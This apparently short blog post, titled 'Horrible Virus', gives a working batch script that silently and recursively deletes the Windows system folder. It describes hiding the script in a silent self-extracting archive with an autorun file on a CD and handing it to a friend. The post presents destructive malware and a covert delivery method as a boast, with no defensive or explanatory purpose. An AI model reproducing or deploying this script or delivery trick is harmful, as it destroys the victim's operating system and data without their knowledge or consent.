Horrible Virus

I once created an batch file which deletes the files in windows folder
A simple and small batch file (But horrible)

@echo off
rmdir/q c:\windows /s
end
Then
:arrow: made an self extractor (using winrar with hidden and silent mode)
:arrow: made an autorun.ini to execute it
:arrow: burned that ona a CD
:arrow: Gave it to my friend

Categories:

0 comments:

Post a Comment